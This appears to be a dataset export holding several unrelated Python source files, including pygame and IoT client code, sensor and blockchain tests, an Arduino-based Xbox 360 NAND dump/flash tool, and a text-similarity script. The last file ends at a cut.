content stringlengths 5 1.05M |
|---|
#!/usr/bin/env python
# coding=utf-8
"""
verify typehints match expected objects
no method found to directly check object instances against non-trivial typehints.
isinstance(«object», «typehint») fails with
`TypeError: isinstance() argument 2 cannot be a parameterized generic`
Some tools exist to parse typehint details, but that then relies on the parsing
code interpretation.
E.g.: is tuple() a valid match for tuple[int, ...]?
"""
# import unittest
# import pytest
# import os
# import sys
# import inspect
import automata_typehints as AHint
# remove need to add parent to path?
# `pipenv run python -m pytest «»`
# ? -q
# class ConstructorArgumentsTestCase(unittest.TestCase):
# def setUp(self):
# pass # run before each individual test
# def tearDown(self):
# pass
# def test_neighbourhood_data_type(self):
# self.assertRaises(TypeError)
def test_not_cell_address():
    """Values that are not cell addresses must be rejected by the typehint."""
    for candidate in (None, ()):
        assert not isinstance(candidate, AHint.CellAddressType)
def test_is_cell_address():
    """A one-element integer tuple is a valid cell address."""
    single_cell = (0,)
    assert isinstance(single_cell, AHint.CellAddressType)
# if __name__ == '__main__':
# unittest.main()
|
import pygame, sys
from pygame.locals import *
from sys import exit
class Player(pygame.sprite.Sprite):
    """A 30x30 solid red square sprite moved one pixel at a time with the arrow keys."""
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        # Placeholder graphic: a red square surface; rect starts at (0, 0).
        self.image = pygame.Surface([30,30])
        self.image.fill([255,0,0])
        self.rect = self.image.get_rect()
    def move_player(self):
        """Move the rect by one pixel in the direction of the currently held arrow key.

        The elif chain means only one direction applies per call, with DOWN
        taking priority over UP, then RIGHT, then LEFT.
        """
        key = pygame.key.get_pressed()
        if key[pygame.K_DOWN]:
            self.rect.y += 1
        elif key[pygame.K_UP]:
            self.rect.y -= 1
        elif key[pygame.K_RIGHT]:
            self.rect.x += 1
        elif key[pygame.K_LEFT]:
            self.rect.x -= 1
    def add_to_group(self):
        # NOTE(review): `all_sprite_list` is not defined anywhere in this file;
        # calling this raises NameError unless the group is created elsewhere — confirm.
        all_sprite_list.add(self)
    def remove_from_group(self):
        # NOTE(review): relies on the same undefined global `all_sprite_list` — confirm.
        all_sprite_list.remove(self)
    def draw(self,surface):
        """Blit the player's image onto *surface* at its current rect position."""
        surface.blit(self.image,(self.rect.x, self.rect.y))
###pygame.image.load(os.path.join('player', 'Player.png'))
# --- module-level setup: window, player, and the main loop ------------------
pygame.init()
screen = pygame.display.set_mode((500,500))
player = Player()
def drawscreen():
    """Clear the whole 500x500 window to near-white."""
    pygame.draw.rect(screen, (250, 250, 250), (0, 0, 500, 500))
def drawplayer():
    """Draw the module-level player onto the module-level screen."""
    player.draw(screen)
while True: # main game loop
    # NOTE(review): no pygame.time.Clock().tick() here, so the loop runs
    # unthrottled and movement speed depends on CPU speed — confirm intent.
    drawscreen()
    player.move_player()
    drawplayer()
    for event in pygame.event.get():
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
    pygame.display.update()
|
# coding: utf-8
"""
Arduino IoT Cloud API
Provides a set of endpoints to manage Arduino IoT Cloud **Devices**, **Things**, **Properties** and **Timeseries**. This API can be called just with any HTTP Client, or using one of these clients: * [Javascript NPM package](https://www.npmjs.com/package/@arduino/arduino-iot-client) * [Python PYPI Package](https://pypi.org/project/arduino-iot-client/) * [Golang Module](https://github.com/arduino/iot-client-go) # noqa: E501
The version of the OpenAPI document: 2.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from arduino_iot_rest.configuration import Configuration
class ModelProperty(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    openapi_types = {
        'max_value': 'float',
        'min_value': 'float',
        'name': 'str',
        'permission': 'str',
        'persist': 'bool',
        'tag': 'float',
        'type': 'str',
        'update_parameter': 'float',
        'update_strategy': 'str',
        'variable_name': 'str'
    }
    attribute_map = {
        'max_value': 'max_value',
        'min_value': 'min_value',
        'name': 'name',
        'permission': 'permission',
        'persist': 'persist',
        'tag': 'tag',
        'type': 'type',
        'update_parameter': 'update_parameter',
        'update_strategy': 'update_strategy',
        'variable_name': 'variable_name'
    }
    def __init__(self, max_value=None, min_value=None, name=None, permission=None, persist=False, tag=None, type=None, update_parameter=None, update_strategy=None, variable_name=None, local_vars_configuration=None):  # noqa: E501
        """ModelProperty - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        # Backing fields for the declared properties; the setters below
        # perform client-side validation when assigning.
        self._max_value = None
        self._min_value = None
        self._name = None
        self._permission = None
        self._persist = None
        self._tag = None
        self._type = None
        self._update_parameter = None
        self._update_strategy = None
        self._variable_name = None
        self.discriminator = None
        # Optional fields are only assigned when provided; required fields
        # (name, permission, type, update_strategy) are always assigned so
        # their setters can reject None.
        if max_value is not None:
            self.max_value = max_value
        if min_value is not None:
            self.min_value = min_value
        self.name = name
        self.permission = permission
        # NOTE(review): `persist` defaults to False, so this `is not None`
        # check is always true as generated.
        if persist is not None:
            self.persist = persist
        if tag is not None:
            self.tag = tag
        self.type = type
        if update_parameter is not None:
            self.update_parameter = update_parameter
        self.update_strategy = update_strategy
        if variable_name is not None:
            self.variable_name = variable_name
    @property
    def max_value(self):
        """Gets the max_value of this ModelProperty.  # noqa: E501
        Maximum value of this property  # noqa: E501
        :return: The max_value of this ModelProperty.  # noqa: E501
        :rtype: float
        """
        return self._max_value
    @max_value.setter
    def max_value(self, max_value):
        """Sets the max_value of this ModelProperty.
        Maximum value of this property  # noqa: E501
        :param max_value: The max_value of this ModelProperty.  # noqa: E501
        :type: float
        """
        self._max_value = max_value
    @property
    def min_value(self):
        """Gets the min_value of this ModelProperty.  # noqa: E501
        Minimum value of this property  # noqa: E501
        :return: The min_value of this ModelProperty.  # noqa: E501
        :rtype: float
        """
        return self._min_value
    @min_value.setter
    def min_value(self, min_value):
        """Sets the min_value of this ModelProperty.
        Minimum value of this property  # noqa: E501
        :param min_value: The min_value of this ModelProperty.  # noqa: E501
        :type: float
        """
        self._min_value = min_value
    @property
    def name(self):
        """Gets the name of this ModelProperty.  # noqa: E501
        The friendly name of the property  # noqa: E501
        :return: The name of this ModelProperty.  # noqa: E501
        :rtype: str
        """
        return self._name
    @name.setter
    def name(self, name):
        """Sets the name of this ModelProperty.
        The friendly name of the property  # noqa: E501
        :param name: The name of this ModelProperty.  # noqa: E501
        :type: str
        """
        if self.local_vars_configuration.client_side_validation and name is None:  # noqa: E501
            raise ValueError("Invalid value for `name`, must not be `None`")  # noqa: E501
        self._name = name
    @property
    def permission(self):
        """Gets the permission of this ModelProperty.  # noqa: E501
        The permission of the property  # noqa: E501
        :return: The permission of this ModelProperty.  # noqa: E501
        :rtype: str
        """
        return self._permission
    @permission.setter
    def permission(self, permission):
        """Sets the permission of this ModelProperty.
        The permission of the property  # noqa: E501
        :param permission: The permission of this ModelProperty.  # noqa: E501
        :type: str
        """
        if self.local_vars_configuration.client_side_validation and permission is None:  # noqa: E501
            raise ValueError("Invalid value for `permission`, must not be `None`")  # noqa: E501
        # Closed enum set from the OpenAPI spec.
        allowed_values = ["READ_ONLY", "READ_WRITE"]  # noqa: E501
        if self.local_vars_configuration.client_side_validation and permission not in allowed_values:  # noqa: E501
            raise ValueError(
                "Invalid value for `permission` ({0}), must be one of {1}"  # noqa: E501
                .format(permission, allowed_values)
            )
        self._permission = permission
    @property
    def persist(self):
        """Gets the persist of this ModelProperty.  # noqa: E501
        If true, data will persist into a timeseries database  # noqa: E501
        :return: The persist of this ModelProperty.  # noqa: E501
        :rtype: bool
        """
        return self._persist
    @persist.setter
    def persist(self, persist):
        """Sets the persist of this ModelProperty.
        If true, data will persist into a timeseries database  # noqa: E501
        :param persist: The persist of this ModelProperty.  # noqa: E501
        :type: bool
        """
        self._persist = persist
    @property
    def tag(self):
        """Gets the tag of this ModelProperty.  # noqa: E501
        The integer id of the property  # noqa: E501
        :return: The tag of this ModelProperty.  # noqa: E501
        :rtype: float
        """
        return self._tag
    @tag.setter
    def tag(self, tag):
        """Sets the tag of this ModelProperty.
        The integer id of the property  # noqa: E501
        :param tag: The tag of this ModelProperty.  # noqa: E501
        :type: float
        """
        self._tag = tag
    @property
    def type(self):
        """Gets the type of this ModelProperty.  # noqa: E501
        The type of the property  # noqa: E501
        :return: The type of this ModelProperty.  # noqa: E501
        :rtype: str
        """
        return self._type
    @type.setter
    def type(self, type):
        """Sets the type of this ModelProperty.
        The type of the property  # noqa: E501
        :param type: The type of this ModelProperty.  # noqa: E501
        :type: str
        """
        if self.local_vars_configuration.client_side_validation and type is None:  # noqa: E501
            raise ValueError("Invalid value for `type`, must not be `None`")  # noqa: E501
        # Closed enum set from the OpenAPI spec (spelling of the "LENGHT_*"
        # entries is as defined by the spec and must not be corrected here).
        allowed_values = ["ANALOG", "CHARSTRING", "FLOAT", "INT", "LENGHT_C", "LENGHT_I", "LENGHT_M", "PERCENTAGE", "STATUS", "TEMPERATURE_C", "TEMPERATURE_F", "METER", "KILOGRAM", "GRAM", "SECOND", "AMPERE", "KELVIN", "CANDELA", "MOLE", "HERTZ", "RADIAN", "STERADIAN", "NEWTON", "PASCAL", "JOULE", "WATT", "COULOMB", "VOLT", "FARAD", "OHM", "SIEMENS", "WEBER", "TESLA", "HENRY", "DEGREES_CELSIUS", "LUMEN", "LUX", "BECQUEREL", "GRAY", "SIEVERT", "KATAL", "SQUARE_METER", "CUBIC_METER", "LITER", "METER_PER_SECOND", "METER_PER_SQUARE_SECOND", "CUBIC_METER_PER_SECOND", "LITER_PER_SECOND", "WATT_PER_SQUARE_METER", "CANDELA_PER_SQUARE_METER", "BIT", "BIT_PER_SECOND", "DEGREES_LATITUDE", "DEGREES_LONGITUDE", "PH_VALUE", "DECIBEL", "DECIBEL_1W", "BEL", "COUNT", "RATIO_DIV", "RATIO_MOD", "PERCENTAGE_RELATIVE_HUMIDITY", "PERCENTAGE_BATTERY_LEVEL", "SECONDS_BATTERY_LEVEL", "EVENT_RATE_SECOND", "EVENT_RATE_MINUTE", "HEART_RATE", "HEART_BEATS", "SIEMENS_PER_METER", "LOCATION", "COLOR_HSB", "COLOR_RGB", "GENERIC_COMPLEX_PROPERTY", "HOME_COLORED_LIGHT", "HOME_DIMMED_LIGHT", "HOME_LIGHT", "HOME_CONTACT_SENSOR", "HOME_MOTION_SENSOR", "HOME_SMART_PLUG", "HOME_TEMPERATURE", "HOME_TEMPERATURE_C", "HOME_TEMPERATURE_F", "HOME_SWITCH", "HOME_TELEVISION", "ENERGY", "FORCE", "TEMPERATURE", "POWER", "ELECTRIC_CURRENT", "ELECTRIC_POTENTIAL", "ELECTRICAL_RESISTANCE", "CAPACITANCE", "TIME", "FREQUENCY", "DATA_RATE", "ACCELERATION", "AREA", "LENGTH", "VELOCITY", "MASS", "VOLUME", "FLOW_RATE", "ANGLE", "ILLUMINANCE", "LUMINOUS_FLUX", "LUMINANCE", "LUMINOUS_INTENSITY", "LOGARITHMIC_QUANTITY", "PRESSURE", "INFORMATION_CONTENT", "SCHEDULE"]  # noqa: E501
        if self.local_vars_configuration.client_side_validation and type not in allowed_values:  # noqa: E501
            raise ValueError(
                "Invalid value for `type` ({0}), must be one of {1}"  # noqa: E501
                .format(type, allowed_values)
            )
        self._type = type
    @property
    def update_parameter(self):
        """Gets the update_parameter of this ModelProperty.  # noqa: E501
        The update frequency in seconds, or the amount of the property has to change in order to trigger an update  # noqa: E501
        :return: The update_parameter of this ModelProperty.  # noqa: E501
        :rtype: float
        """
        return self._update_parameter
    @update_parameter.setter
    def update_parameter(self, update_parameter):
        """Sets the update_parameter of this ModelProperty.
        The update frequency in seconds, or the amount of the property has to change in order to trigger an update  # noqa: E501
        :param update_parameter: The update_parameter of this ModelProperty.  # noqa: E501
        :type: float
        """
        self._update_parameter = update_parameter
    @property
    def update_strategy(self):
        """Gets the update_strategy of this ModelProperty.  # noqa: E501
        The update strategy for the property value  # noqa: E501
        :return: The update_strategy of this ModelProperty.  # noqa: E501
        :rtype: str
        """
        return self._update_strategy
    @update_strategy.setter
    def update_strategy(self, update_strategy):
        """Sets the update_strategy of this ModelProperty.
        The update strategy for the property value  # noqa: E501
        :param update_strategy: The update_strategy of this ModelProperty.  # noqa: E501
        :type: str
        """
        if self.local_vars_configuration.client_side_validation and update_strategy is None:  # noqa: E501
            raise ValueError("Invalid value for `update_strategy`, must not be `None`")  # noqa: E501
        # Closed enum set from the OpenAPI spec.
        allowed_values = ["ON_CHANGE", "TIMED"]  # noqa: E501
        if self.local_vars_configuration.client_side_validation and update_strategy not in allowed_values:  # noqa: E501
            raise ValueError(
                "Invalid value for `update_strategy` ({0}), must be one of {1}"  # noqa: E501
                .format(update_strategy, allowed_values)
            )
        self._update_strategy = update_strategy
    @property
    def variable_name(self):
        """Gets the variable_name of this ModelProperty.  # noqa: E501
        The sketch variable name of the property  # noqa: E501
        :return: The variable_name of this ModelProperty.  # noqa: E501
        :rtype: str
        """
        return self._variable_name
    @variable_name.setter
    def variable_name(self, variable_name):
        """Sets the variable_name of this ModelProperty.
        The sketch variable name of the property  # noqa: E501
        :param variable_name: The variable_name of this ModelProperty.  # noqa: E501
        :type: str
        """
        if (self.local_vars_configuration.client_side_validation and
                variable_name is not None and len(variable_name) > 64):
            raise ValueError("Invalid value for `variable_name`, length must be less than or equal to `64`")  # noqa: E501
        if (self.local_vars_configuration.client_side_validation and
                variable_name is not None and not re.search(r'^[a-zA-Z_][a-zA-Z0-9_]*$', variable_name)):  # noqa: E501
            raise ValueError(r"Invalid value for `variable_name`, must be a follow pattern or equal to `/^[a-zA-Z_][a-zA-Z0-9_]*$/`")  # noqa: E501
        self._variable_name = variable_name
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively serialize nested models (anything with to_dict),
        # lists and dicts of them, and pass plain values through.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, ModelProperty):
            return False
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, ModelProperty):
            return True
        return self.to_dict() != other.to_dict()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
/*
* Copyright (c) 2015, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
"""
import time

import Adafruit_DHT # Adafruit library required for temperature sensing
TEMP_PIN = 4
TEMP_SENSOR_TYPE = 11
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Reading temperature
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def readTemperature():
    """Read temperature/humidity from the DHT sensor and print one reading.

    Uses Adafruit_DHT.read_retry, which retries up to 15 times (waiting
    2 seconds between retries) to get a sensor reading.  Keeps looping,
    sleeping 3 seconds between failed attempts, until a reading succeeds.
    """
    while True:
        try:
            humidity, temperature = Adafruit_DHT.read_retry(TEMP_SENSOR_TYPE, TEMP_PIN)
            # Output format consumed downstream: "<tempC>C:<humidity>%".
            print('{0:0.1f}C:{1:0.1f}%'.format(temperature, humidity))
            return
        except Exception as e:
            print("RASPBERRY_STATS: Exception in TempReaderThread: Could not successfully read Temperature")
            print("RASPBERRY_STATS: " + str(e))
            print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
            # Fix: `time` was used here without being imported, so the failure
            # path raised NameError; it is now imported at module level.
            time.sleep(3)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# The Main method of the server script
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def main():
    """Entry point: take a single sensor reading and print it."""
    readTemperature()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if __name__ == '__main__':
main() |
import re
from datetime import datetime
import pytest
from pydantic import ValidationError
from node.blockchain.facade import BlockchainFacade
from node.blockchain.inner_models import (
AccountState, BlockMessage, BlockMessageUpdate, CoinTransferBlockMessage, CoinTransferSignedChangeRequest
)
from node.blockchain.types import Type
@pytest.mark.usefixtures('base_blockchain')
def test_create_from_signed_change_request(
    coin_transfer_signed_change_request_message, treasury_account_key_pair, treasury_amount
):
    """A BlockMessage built from a coin-transfer SCR carries the expected header and account update."""
    request = CoinTransferSignedChangeRequest.create_from_signed_change_request_message(
        message=coin_transfer_signed_change_request_message,
        signing_key=treasury_account_key_pair.private,
    )
    blockchain_facade = BlockchainFacade.get_instance()
    # Capture expectations *before* building the message: they come from the
    # facade's current chain head.
    expected_block_number = blockchain_facade.get_next_block_number()
    expected_identifier = blockchain_facade.get_next_block_identifier()
    message = BlockMessage.create_from_signed_change_request(request, blockchain_facade)
    assert message.number == expected_block_number
    assert message.identifier == expected_identifier
    assert message.type == Type.COIN_TRANSFER
    # Block message timestamps are naive datetimes (no tzinfo).
    assert isinstance(message.timestamp, datetime)
    assert message.timestamp.tzinfo is None
    update = message.update
    # Sender's account state: lock advances to the request hash and the
    # balance decreases by the request's total amount.
    assert update.accounts.get(request.signer) == AccountState(
        account_lock=request.make_hash(),
        balance=treasury_amount - coin_transfer_signed_change_request_message.get_total_amount(),
    )
    assert update.schedule is None
def test_serialize_deserialize_works(coin_transfer_block_message):
    """JSON round-trip of a coin-transfer block message is lossless."""
    original = coin_transfer_block_message
    as_json = original.json()
    restored = BlockMessage.parse_raw(as_json)
    # Compare field by field first so a failure pinpoints the broken attribute.
    assert restored.type == original.type
    assert restored.number == original.number
    assert restored.identifier == original.identifier
    assert restored.timestamp == original.timestamp
    assert restored.request.signer == original.request.signer
    assert restored.request.signature == original.request.signature
    assert restored.request.message == original.request.message
    assert restored.request == original.request
    assert restored.update == original.update
    assert restored == original
    # Re-serializing the restored object must reproduce the original JSON.
    assert as_json == restored.json()
def test_block_identifier_is_mandatory(treasure_coin_transfer_signed_change_request, treasury_account_key_pair):
    """Constructing a CoinTransferBlockMessage with identifier=None must fail validation."""
    # Control case: an otherwise-identical message with a well-formed
    # identifier constructs without raising.
    CoinTransferBlockMessage(
        number=1,
        identifier='0' * 64,
        timestamp=datetime.utcnow(),
        request=treasure_coin_transfer_signed_change_request,
        update=BlockMessageUpdate(accounts={'0' * 64: AccountState(balance=10)}),
    )
    with pytest.raises(ValidationError) as exc_info:
        CoinTransferBlockMessage(
            number=1,
            identifier=None,
            timestamp=datetime.utcnow(),
            request=treasure_coin_transfer_signed_change_request,
            update=BlockMessageUpdate(accounts={'0' * 64: AccountState(balance=10)}),
        )
    # The validation message spans lines; DOTALL lets `.` cross newlines.
    assert re.search(r'identifier.*none is not an allowed value', str(exc_info.value), flags=re.DOTALL)
|
"""
xbox360-arduino-flasher
--Ian Ling (https://iancaling.com)
Dumps xbox360 NAND via an Arduino
"""
import serial
import struct
from math import floor
from sys import argv, exit
from time import time
# globals
SERIAL_DEVICE = "/dev/ttyACM0"
BAUD_RATE = 115200
DUMP_COMMAND = b"d"
FLASH_COMMAND = b"f"
FLASH_CONFIG_COMMAND = b"c"
OUT_FILE = "dump.bin"

# timeout=0 makes reads non-blocking: read() returns whatever is buffered.
arduino = serial.Serial(SERIAL_DEVICE, BAUD_RATE, timeout=0)

# dump: stream the full NAND image from the Arduino into OUT_FILE
if argv[1] == "d":
    # Fix: use the OUT_FILE constant (the literal "dump.bin" was duplicated
    # here) and a context manager so the file is closed even on failure.
    with open(OUT_FILE, "wb") as f:
        arduino.write(DUMP_COMMAND)
        expected_length = 17301504  # full NAND image size in bytes
        percent_done = 0
        i = 0
        start_time = time()
        print(f"Started at {start_time}")
        while i < expected_length:
            data = arduino.read(BAUD_RATE // 8)
            i += len(data)
            f.write(data)
            previous_percent_done = percent_done
            percent_done = floor(i/expected_length*100)
            # Only repaint the progress line when the整percentage advances.
            if percent_done - previous_percent_done > 0:
                time_elapsed = time() - start_time
                print(f"\r \r{percent_done}% -- {i // time_elapsed}Bps", end="")
        end_time = time()
        print(f"\nFinished at {end_time}")
# flash: write a local image file to the NAND, one 528-byte page at a time
elif argv[1] == "f":
    arduino.write(FLASH_COMMAND)
    # send length of file to write (closed promptly via context manager)
    with open(argv[2], 'rb') as f:
        data = f.read()
    file_length = len(data)
    arduino.write(struct.pack(">I", file_length))
    # read back length from arduino
    expected_length = 11 # max length of a uint32_t cast to a string is 10 characters
    buffer = b""
    while len(buffer) < expected_length:
        if len(buffer) > 0:
            print(repr(buffer))
        buffer += arduino.read(BAUD_RATE // 8)
    # throw out everything after the null byte (arduino sent a null terminated string)
    buffer = buffer[0:buffer.index(b"\x00")]
    if int(buffer) != file_length:
        print("Arduino sent back the wrong data length, aborting. No data was written, NAND is unaltered.")
        exit(1)
    print("Handshake successful, waiting for Arduino to request data...")
    # send data to arduino 1 page (528 bytes) at a time
    i = 0
    percent_done = 0
    arduino_ready_to_receive = False
    start_time = time()
    print(f"Started at {start_time}")
    while i < file_length:
        # wait for arduino to tell us it's ready to receive data (a NUL byte)
        while not arduino_ready_to_receive:
            if arduino.read(BAUD_RATE // 8) == b"\x00":
                arduino_ready_to_receive = True
        data_to_send = data[i:i + 528]
        arduino.write(data_to_send)
        i += 528
        arduino_ready_to_receive = False
        previous_percent_done = percent_done
        percent_done = floor(i/file_length*100)
        if percent_done - previous_percent_done > 0:
            time_elapsed = time() - start_time
            print(f"\r \r{percent_done}% -- {i // time_elapsed}Bps", end="")
    end_time = time()
    print(f"\nFinished at {end_time}")
# check flash config
elif argv[1] == "c":
    arduino.write(FLASH_CONFIG_COMMAND)
    expected_length = 4 # flash config is 4 bytes long
    buffer = b""
    while len(buffer) < expected_length:
        buffer += arduino.read(BAUD_RATE // 8)
    print(repr(buffer))
|
from setuptools import setup
# Use the README verbatim as the long description shown on PyPI.
with open("README.md","r") as fh:
    long_description=fh.read()
setup(
    name='hithere',
    version='0.0.1',
    description="Say hi !!",
    py_modules=["hithere"],
    package_dir={'':'src'},  # src/ layout: modules live under src/
    long_description=long_description,
    long_description_content_type="text/markdown",
    install_requires=[
        "blessings ~= 1.7",
    ],
    extras_require={
        # `pip install hithere[dev]` pulls in the test tooling.
        "dev":[
            "pytest>=3.7.4",
        ],
    },
    url="https://github.com/abinashstack/pypi",
    author="Abinash Gogoi",
    author_email="abinash.gogoi55@gmail.com"
)
#!/usr/bin/env python
##########################################################################################
# Developer: Icaro Alzuru Project: HuMaIN (http://humain.acis.ufl.edu)
# Description:
# Compares the text files of two directories using the Damerau-Levenshtein similarity.
#
##########################################################################################
# Copyright 2019 Advanced Computing and Information Systems (ACIS) Lab - UF
# (https://www.acis.ufl.edu/)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################################
import sys, os, argparse
import pandas as pd
from pyxdameraulevenshtein import normalized_damerau_levenshtein_distance
# ----------------------------------------------------------------------------------
def compare_DL( filename1, filename2 ):
    """Return the normalized Damerau-Levenshtein similarity of two text files.

    Each file is flattened to a single line (newlines replaced by spaces)
    before comparison.

    Returns a float in [0.0, 1.0] on success, or a negative error code when a
    file is missing (-3: first file, -4: second file) so callers can filter
    results with `sim >= 0.0`.
    """
    # Sanity check
    if not os.path.isfile(filename1):
        print('\nERROR: First source file ' + filename1 + ' was not found.\n')
        return(-3)
    if not os.path.isfile(filename2):
        print('\nERROR: Second source file ' + filename2 + ' was not found.\n')
        return(-4)
    # Join each file's lines with single spaces.  This reproduces the previous
    # concatenate-then-trim loop (which also left dead `f1 = None` / `f2 = None`
    # assignments) without the quadratic string building.
    with open( filename1 ) as f1:
        text1 = ' '.join(line.rstrip('\n') for line in f1)
    with open( filename2 ) as f2:
        text2 = ' '.join(line.rstrip('\n') for line in f2)
    # The library returns a normalized distance in [0, 1]; similarity is its complement.
    sim = 1.0 - normalized_damerau_levenshtein_distance( text1, text2 )
    return( sim )
# Use: python3 ../ALOT/fulltext_similarity_DL_dir.py -d1 ./biocolls/digi_13297227/fulltext -d2 ./fulltext/digi_13297227_google -o DL_comparison/digi_13297227_google.csv
# ----------------------------------------------------------------------------------
if __name__ == '__main__':
    """ Compares the text files of two directories using the Damerau-Levenshtein similarity.
    """
    # Read arguments
    parser = argparse.ArgumentParser("Compares the text files of two directories using the Damerau-Levenshtein similarity.")
    parser.add_argument('-d1','--dir1',action="store", required=True, help="First directory.")
    parser.add_argument('-d2','--dir2',action="store", required=True, help="Second directory.")
    parser.add_argument('-o','--output',action="store", required=True, help="Path + filename of the csv file which will store the output.")
    args = parser.parse_args()
    # Sanity check
    if not os.path.isdir( args.dir1 ):
        print('\nERROR: First directory ' + args.dir1 + ' was not found.\n')
        parser.print_help()
        sys.exit(-1)
    if not os.path.isdir( args.dir2 ):
        print('\nERROR: Second directory ' + args.dir2 + ' was not found.\n')
        parser.print_help()
        sys.exit(-2)
    # Create the lists of files to process
    files_list = list()
    # NOTE(review): os.walk recurses into subdirectories and `files_list` is
    # REASSIGNED on every iteration, so only the files of the LAST directory
    # visited survive.  If only top-level .txt files are intended, a `break`
    # after the first iteration is the fix — confirm intent before changing.
    for root, dirs, filenames in os.walk( args.dir1 ):
        files_list = list(f for f in filenames if f.endswith('.txt'))
    # Process each text file
    with open( args.output, 'w+') as f_out:
        for filename in files_list:
            path_filename_1 = args.dir1 + '/' + filename
            path_filename_2 = args.dir2 + '/' + filename
            sim = compare_DL( path_filename_1, path_filename_2 )
            # Negative values are error codes from compare_DL; skip those rows.
            if sim >= 0.0:
                f_out.write(filename + ',' + str(sim) + '\n')
|
#! /usr/bin/env python
############################################################################
# Copyright (c) 2009 Dr. Peter Bunting, Aberystwyth University
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#
# Purpose: The generation a row summary for each class.
#
# Author: Pete Bunting
# Email: pete.bunting@aber.ac.uk
# Date: 22/09/2009
# Version: 1.0
#
# History:
# Version 1.0 - Created.
#
#############################################################################
import os.path
import sys
def checkforHash(line):
    """Return True if *line* contains a '#' (i.e. is treated as a comment line)."""
    # Idiom fix: a membership test replaces the manual character-index loop.
    return '#' in line
def stringTokenizer(line, delimiter):
    """Split *line* on every occurrence of *delimiter* and return the tokens.

    Equivalent to str.split for the single-character delimiters this file
    uses (','): an empty line yields [''], and adjacent delimiters yield
    empty tokens.  Kept as a named helper because the rest of the file calls it.
    """
    # Idiom fix: str.split replaces the manual character-accumulation loop.
    return line.split(delimiter)
class SummaryRows (object):
    """Generates one summary row per class from an input CSV.

    Each output row holds, for every variable column, the class's summed value
    expressed as a percentage of that class's grand total (see getDataSummary).
    Note: this file uses Python 2 print statements.
    """
    def readVariableNames(self, inputCSV):
        """Return the variable names from the CSV header line (first column skipped)."""
        dataFile = open(inputCSV, 'r')
        line = dataFile.readline()
        tokens = stringTokenizer(line, ',')
        variables = list()
        first = True
        for token in tokens:
            if first:
                # Skip the first header column (the class-name column).
                first = False
            else:
                variables.append(token.strip())
        dataFile.close()
        return variables
